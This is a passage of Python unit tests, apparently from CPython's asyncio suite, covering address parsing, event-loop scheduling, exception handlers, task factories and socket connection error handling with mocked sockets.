self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
if socket_helper.IPV6_ENABLED:
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = self.loop.create_future()
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
class DummyExecutor(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
raise NotImplementedError(
'cannot submit into a dummy executor')
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
executor = DummyExecutor()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_set_default_executor_deprecation_warnings(self):
executor = mock.Mock()
with self.assertWarns(DeprecationWarning):
self.loop.set_default_executor(executor)
# Avoid cleaning up the executor mock
self.loop._default_executor = None
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = loop.create_future()
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = self.loop.create_future()
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(SystemExit):
pass
async def foo(delay):
await asyncio.sleep(delay)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
with self.assertRaises(ShowStopper):
self.loop.run_until_complete(foo(0.1))
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
async def zero_error_coro():
await asyncio.sleep(0.01)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
async def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
async def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_create_named_task_with_default_factory(self):
async def test():
pass
loop = asyncio.new_event_loop()
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_create_named_task_with_custom_factory(self):
def task_factory(loop, coro):
return asyncio.Task(coro, loop=loop)
async def test():
pass
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
# run_forever() consumes the KeyboardInterrupt and so don't log
# a warning
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
# it's a de-factor standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.get_running_loop().create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = self.loop.create_future()
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
srv = await asyncio.start_server(lambda: None, '::1', 0)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
async def getaddrinfo(*args, **kw):
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
